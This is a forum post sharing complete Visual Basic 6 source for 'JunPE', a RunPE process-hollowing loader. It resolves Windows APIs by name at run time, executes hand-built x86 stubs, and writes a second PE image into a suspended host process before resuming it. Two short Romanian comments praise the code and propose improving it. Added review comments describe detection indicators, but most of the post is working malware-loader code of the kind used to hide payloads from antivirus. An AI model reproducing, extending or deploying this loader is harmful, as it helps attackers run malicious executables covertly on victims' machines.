Nytro

[VB6] RunPe + CallApiByName (JunPE)


[VB6] RunPe + CallApiByName (JunPE)

Product: JunPE

Description: RunPe + CallApiByName

Author: Jhonjhon_123 - [J.J.G.P]

Option Explicit
' ****************************************************************************************************************************** '
'
' --- Author: Jhonjhon_123 (Jhon Jairo Pro Developer)
' --- Description: RunPe + CallApiByName
' --- Distribution: Free
' --- Terms of use:
' --- Commercial sale is prohibited.
' --- The credits must not be removed.
'
' --- Functions:
' --- IniciarDDLL()
' - Initialises the configuration (fills the bMoveMem stub; must run before MoveMemory / ExecuteBytes)
'
' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
' - RunPE
' * sName: path to the exe (used as the host process)
' * bBytes: bytes to execute (a 32-bit PE image)
'
' ****************************************************************************************************************************** '
' NOTE(review): this module implements "process hollowing" (RunPE): a host process is created suspended, its image is
' unmapped, a second PE is written into the same address range and the primary thread is pointed at the new entry point.
' From a defender's view the sequence CreateProcess(CREATE_SUSPENDED) -> NtUnmapViewOfSection -> VirtualAllocEx(RWX) ->
' WriteProcessMemory -> SetThreadContext -> ResumeThread issued by one process is the classic hollowing indicator.
' Only the four imports below are declared statically; every other API is resolved by name at run time through Call_,
' so a static import-table scan does not show them - the API names are, however, present as plain strings.
Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) ' raw byte copy, used to assemble the stubs
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long ' used as a generic "jump to addr with 4 args" primitive
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Dim bMoveMem(36) As Byte ' 37-byte x86 memcpy stub; filled by IniciarDDLL, executed through CallWindowProcA by MoveMemory
Public Sub IniciarDDLL()
' Fills bMoveMem with a small 32-bit x86 stub: a memcpy (rep movsd for whole dwords, then rep movsb for the remainder)
' that ends in "ret 10h", so it pops exactly the four arguments CallWindowProcA passes to it (dest, src, count, unused).
' Must be called once before MoveMemory or ExecuteBytes; until then bMoveMem is all zeros and MoveMemory would jump into
' a zeroed buffer. The trailing &H0, &H20 bytes sit after the ret and are never executed.
Dim vTMP As Variant
Dim D As Long
' Array() yields Variants, hence the element-by-element CByte conversion into the Byte array.
For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)
bMoveMem(D) = CByte(vTMP): D = D + 1
Next
End Sub
'By Cobein
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
' "CallApiByName": calls any exported function without a Declare. sLib is loaded with LoadLibraryA, sMod resolved with
' GetProcAddress, and a tiny x86 stub is written into bvASM that pushes Params right-to-left, calls the export and
' returns. The stub is entered through CallWindowProcA; its first instructions discard CallWindowProcA's four placeholder
' arguments so the stack is balanced when the stub's final ret executes.
' Returns the callee's EAX. Returns 0 when the export cannot be resolved; any other failure is hidden by
' On Error Resume Next, so a caller cannot tell a genuine 0 result from an error.
' Hardening note: the stub executes from a data buffer, so this presumably only works where DEP/NX is not enforced
' for the host process.
On Error Resume Next
Dim lPtr As Long
Dim bvASM(&HEC00& - 1) As Byte ' stub buffer; far larger than the bytes actually written (6 + 5 per param + 6)
Dim i As Long
Dim lMod As Long
lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
If lMod = 0 Then Exit Function ' export not found: Call_ keeps its default 0
lPtr = VarPtr(bvASM(0))
' Prologue: pop the return address, pop CallWindowProcA's four dummy args, push the return address back.
RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2
' One "push imm32" per argument, last argument first. Each value is forced through CLng; a value that does not fit a
' signed Long raises an error that On Error Resume Next skips, presumably leaving that slot as the buffer's zero bytes.
For i = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4
Next
' "call rel32" to the resolved export (displacement is relative to the end of the 5-byte instruction), then "ret".
RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function
' By Strike Bot
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)
' Copies cBytes from lpSource to lpDestino by executing the bMoveMem stub through CallWindowProcA; the trailing 0 is
' only there to satisfy the stub's "ret 10h". Functionally the same as RtlMoveMemory ByVal lpDestino, ByVal lpSource,
' cBytes. Requires IniciarDDLL to have run first; neither pointer nor the length is validated.
Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)
End Sub
' By Jhonjhon_123
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
' RunPE / process hollowing. Starts sName as a suspended host process, replaces its mapped image with the 32-bit PE held
' in bBytes at that PE's preferred ImageBase, points the primary thread at the new entry point and resumes it.
' sName : path of the host executable (passed as lpCommandLine to CreateProcessW via StrPtr).
' bBytes: raw bytes of a PE32 file. Nothing is validated: no MZ/PE signature check, no PE32 vs PE32+ check, no bounds
'         check on e_lfanew or the section offsets. An out-of-range index raises a subscript error that
'         On Error Resume Next swallows, so later steps then run on zero-valued fields.
' Every API result is discarded, hProcess/hThread are never closed, and ResumeThread is called unconditionally, so a
' partially hollowed host is resumed even when an earlier step failed.
' Detection: the observable call chain is CreateProcessW(CREATE_SUSPENDED) -> NtUnmapViewOfSection -> VirtualAllocEx(RWX)
' -> WriteProcessMemory (headers, each section, PEB.ImageBaseAddress) -> GetThreadContext -> SetThreadContext -> ResumeThread.
On Error Resume Next
Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER
Dim bInh(247) As Byte ' IMAGE_NT_HEADERS (32-bit layout, 248 bytes)
Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER
Dim bPi(15) As Byte ' PROCESS_INFORMATION
Dim bSi(67) As Byte ' STARTUPINFO
Dim bCtx(203) As Byte ' CONTEXT86 (x86 CONTEXT without the extended-registers area)
Dim e_lfanew As Long
Dim ImageBase As Long
Dim hProcess As Long
Dim hThread As Long
Dim SizeOfImage As Long
Dim SizeOfHeaders As Long
Dim AddressOfEntryPoint As Long
Dim NumberOfSections As Integer
Dim VirtualAddress As Long
Dim PointerToRawData As Long
Dim SizeOfRawData As Long
Dim Ebx As Long
Dim Eax As Long ' declared but never used; the EAX slot of the CONTEXT is written via lTemp below
Dim lTemp As Long
Dim D As Long
' STARTUPINFO.cb = 68 (sizeof STARTUPINFO on 32-bit); the rest of the structure stays zero.
lTemp = 68
MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&
' CONTEXT.ContextFlags = &H10007 = CONTEXT_FULL for x86, so Get/SetThreadContext cover the integer and control registers.
lTemp = &H10007
MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&
' Parse the headers of the image to inject: DOS header, e_lfanew at +60, then the NT headers at e_lfanew.
MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&
MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&
MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&
' Optional-header fields (32-bit offsets from the start of IMAGE_NT_HEADERS): ImageBase +52, SizeOfImage +80,
' SizeOfHeaders +84, AddressOfEntryPoint +40; NumberOfSections is in the file header at +6.
MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&
MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&
MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&
MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&
MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&
' CreateProcessW(NULL, sName, NULL, NULL, FALSE, CREATE_SUSPENDED (&H4), NULL, NULL, &si, &pi). Its BOOL result is ignored.
Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))
' PROCESS_INFORMATION: hProcess at +0, hThread at +4 (both zero if CreateProcessW failed; neither is checked).
MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&
MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&
' Unmap whatever is mapped at the *payload's* ImageBase in the host, then reserve+commit SizeOfImage bytes there as
' PAGE_EXECUTE_READWRITE (&H40). The payload is always placed at its preferred base; there is no relocation handling,
' so this relies on that range being available in the host.
Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)
Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)
' Copy the headers, then each section from its file offset (PointerToRawData) to its RVA (VirtualAddress).
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)
For D = 0 To NumberOfSections - 1
' Section table starts right after the 248-byte NT headers, one 40-byte entry per section.
MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&
MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&
MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&
MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)
Next
' Read the suspended primary thread's registers. In the x86 CONTEXT, Ebx is at +164 and for a freshly created thread
' holds the PEB address; PEB+8 is ImageBaseAddress, which is overwritten with the payload's base.
Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))
MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)
' CONTEXT offset +176 is Eax; on a freshly created suspended thread the loader takes the entry point from EAX,
' so it is set to the payload's entry point and the thread is resumed.
lTemp = ImageBase + AddressOfEntryPoint
MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&
Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))
Call Call_("kernel32", "ResumeThread", hThread)
End Sub

Sursa: RunPe + CallApiByName (JunPE)


Ce e mai frumos decat MoveMemory si CopyMemory :X Super, deja am idei de a imbunatati ExecuteBytes; ai postat si ceva de genul in C++, daca nu ma insel.

Cam sacadeaza functia... Nu vad ZeroMemory sau CloseHandle pentru hProcess sau hThread, dar probabil a facut el versiunea standard; cand lucrezi cu astfel de functii le mai dai si free la urma. MoveMemory e o functie destul de volatila, mai ales in VB.

Oricum, e super functia; e altceva fata de ce mai vazusem in trecut.

